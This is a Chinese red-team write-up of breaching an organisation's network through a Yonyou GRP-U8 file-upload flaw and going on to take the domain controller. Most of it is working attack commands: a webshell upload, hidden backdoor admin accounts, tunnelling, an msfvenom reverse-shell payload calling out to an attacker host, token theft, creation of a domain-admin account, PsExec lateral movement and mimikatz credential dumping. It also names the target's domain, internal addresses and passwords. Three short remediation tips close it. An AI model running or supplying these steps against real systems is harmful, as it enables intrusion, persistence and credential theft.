红蓝对抗中打穿某单位成功拿下域控

chenqiang

原文链接：红蓝对抗中打穿某单位成功拿下域控

一、开始攻击

步骤一：检测抓取XXX在网络中的资产分布，检测到以下地址为其行政事业财务管理系统界面（那肯定有戏了阿）

步骤二：目录扫描检测是否存在漏洞发现用友 GRP-U8 UploadFileData接口并下载以下项目执行命令进行漏洞检测....发现存在漏洞

1. <div>#项目地址</div><div><a href="https://github.com/xanszZZ/YY_upfile#" target="_blank">https://github.com/xanszZZ/YY_upfile</a></div><div><a href="https://github.com/xanszZZ/YY_upfile#" target="_blank">#</a>安装</div><div>pocsuite3pip3 install -i <a href="https://pypi.tuna.tsinghua.edu.cn/simple" target="_blank">https://pypi.tuna.tsinghua.edu.cn/simple</a> pocsuite3</div><div>#进行漏洞检测</div><div>pocsuite -r YY_upfile.py -f file.txt</div>

复制代码

步骤三：使用攻击脚本攻击成功后访问以下页面进行漏洞验证....查看是否上传存在漏洞即可尝试获取网站后门

1. http://X.X.X.X:8000/R9iPortal/debugg.jsp

复制代码

步骤四：在以上项目的攻击脚本中将测试代码data变量中的值修改为一句话木马进而执行以下命令获取网站后门.....

1. <div>#攻击命令</div><div>pocsuite -r YY_upfile2.py -f file.txt</div>

复制代码

步骤五：以执行成功后拼接访问以下地址为网站后门地址...进行验证；返回空白页面说名成功并使用哥斯拉客户端连接验证 Bingo!

1. http://X.X.X.X:8000/R9iPortal/U8date.jsp    //哥斯拉默认连接

复制代码

步骤六：在使用哥斯拉连接上网站后门进行简单的信息收集如下...

whoami                 

#nt authority\system
hostname               

#whkqgu8
ipconfig /all         

#域wuhankq.com   内172.16.0.8  

systeminfo            

#Microsoft Windows Server 2008 R2 Enterprise   VMware, Inc
tasklist /svc         

#无
net time /domain      

#WHKQBAK.wuhankq.com  //查询时间服务器  172.16.0.1
netstat -an            

#RDP:3389
net user 4pts$ 123admiN@ /add            

#成功
net localgroup administrators 4pts$ /add

#成功
net user 4k 123admiN /add /doamin        

#失败
net group "Domain Users" /domain         

#无4k用户
net user 4pts$ 123admiN@ /add     

#隐藏的系统账户
net localgroup administrators 4pts$ /add

步骤七：判断出存在域环境直接执行上线...

步骤八：由于只有内网IP地址且已经开启RDP服务，故需要在此搭建通信隧道进行远程桌面连接，部署Neo-Regorg并访问，本地执行命令与边界主机建立通信隧道....

1. <div>#Neo-regorg服务端地址</div><div><a href="http://X.X.X.X:8000/showstatus.jsp#" target="_blank">http://X.X.X.X:8000/showstatus.jsp</a></div><div><a href="http://X.X.X.X:8000/showstatus.jsp#" target="_blank">#</a>通信隧道建立命令</div><div>python3 neoreg.py -k 123admiN -u <a href="http://X.X.X.X:8000/showstatus.jsp" target="_blank">http://X.X.X.X:8000/showstatus.jsp</a></div>

复制代码

步骤九：开启SockCap64软件并配置好代理进行测试...成功

步骤十：在Sockcap64上开启远程桌面连接并输入以上步骤中创建的本地账号(系统后门)进行连接...

步骤十一：开始进行内网信息收集....执行以下命令并获取信息

#CS执行
logonpasswords    //username:Administrator   password@ssword2adminshell

net group "Domain Computers" /domain   

//255台主机 #哥斯拉中查询敏感信息
C:/Users/Administrator.WUHANKQ/   

//文件修改日期2022年12月7日

步骤十二：尝试使用读取出的本地账号与明文密码对域控进行PTH攻击且失败无果.....存在以下攻击思路！

1. <div>1.进一步扫描获取更多的信息，但是动静会很大~暂且备用</div><div>2.本地机器上存在域管理员的用户文件夹~可优先尝试窃取该用户的会话令牌</div>

复制代码

步骤十三：选择第二个攻击思路！直接在哥斯拉中反弹MSF的Shell....失败；生成MSF上传执行上线....

1. 
   
2. #哥斯拉操作
   
3. payload windows/meterpreter/reverse_tcp   //反弹失败
   
4. payload java/meterpreter/reverse_tcp      //反弹成功  无法获取会话令牌
   
5. #生成木马文件
   
6. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe -o Sysupdate.exe
   
7. #MSFCONSOLE
   
8. msfconsole                                      //启动MSF的漏洞攻击框架
   
9. use exploit/multi/handler                       //调用木马监听模块
   
10. set payload windows/meterpreter/reverse_tcp     //设置木马服务端类型
    
11. set lhost 10.0.20.3                             //设置监听的地址
    
12. set lport 6666                                  //设置监听的端口
    
13. run  

复制代码

步骤十四：开始窃取域管理员的会话令牌并验证...

1. 
   
2. #Meterpreter操作
   
3. use incognito      //进入incognito模块
   
4. list_tokens -u    //列出令牌
   
5. impersonate_token "WUHANKQ\Administrator"    //选择要窃取的账号
   
6. #验证权限
   
7. shell         
   
8. chcp 65001      //活动代码页字符为UTF-8编码
   
9. whoami

复制代码

步骤十五：尝试在Meterpreter中创建域控管理员账户...失败；在CMD下执行创建成功;

1. 
   
2. #Meterpreter操作
   
3. add_user username password -h 域控IP
   
4. add_group_user "Domain Admins" username -h 域控IP
   
5. add_user 24k 123admiN@ -h 172.16.0.20
   
6. add_group_user "Domain Admins" 24k -h 172.16.0.20
   
7. #目标CMD下操作
   
8. chcp 65001
   
9. net user 24k 123admiN@ /add /domain
   
10. net group "Domain Admins" 24k /add /domain
    
11. net group "Domain Admins" /domain
    
12. net group "Administrators" 24k /add /domain     #失败

复制代码

步骤十六：已经获取域管理后门账号尝试在边界主机上对域控进行远程登陆....失败；

username:wuhankq\24k
password:123admiN@

步骤十七：出现以下问题，网上给出的解决方案需要在目标终端中执行以下命令【没卵用】...尝试横向移动到域控

1. 
   
2. #解决命令
   
3. sfc /scannow    //无果
   
4. #横向移动命令
   
5. net use \\172.16.0.20 /u:wuhankq\24k 123admiN@   //建立IPC$连接
   
6. net use                    //查看已经建立的IPC$连接
   
7. PsExec64.exe \\172.16.0.20 -s cmd.exe -accepteula   //反弹cmd
   
8. dir \\172.16.0.20\c$                                 //查看默认的C盘共享
   
9. copy SystemUpdate.exe \\172.16.0.20\c$               //拷贝本地CS马执行上线

复制代码

步骤十八：在域控上执行命令查询存在的防护软件为卡巴斯基，这里对mimikatz进行源码免杀上传执行...

1. 
   
2. #AV查询
   
3. shell tasklist /svc
   
4. avp.exe-> Kaspersky
   
5. avp.exe-> Kaspersky
   
6. #明文抓取
   
7. privilege::debug
   
8. sekurlsa::logonpasswords

复制代码

成功拿下域控

二、修复建议

1、升级用友GRP-U8管理系统并打上最新的补丁文件

2、域控策略中设置域管理员禁止登陆除域控的其他主机

3、增强用户密码强度 并设置定期修改密码的用户策略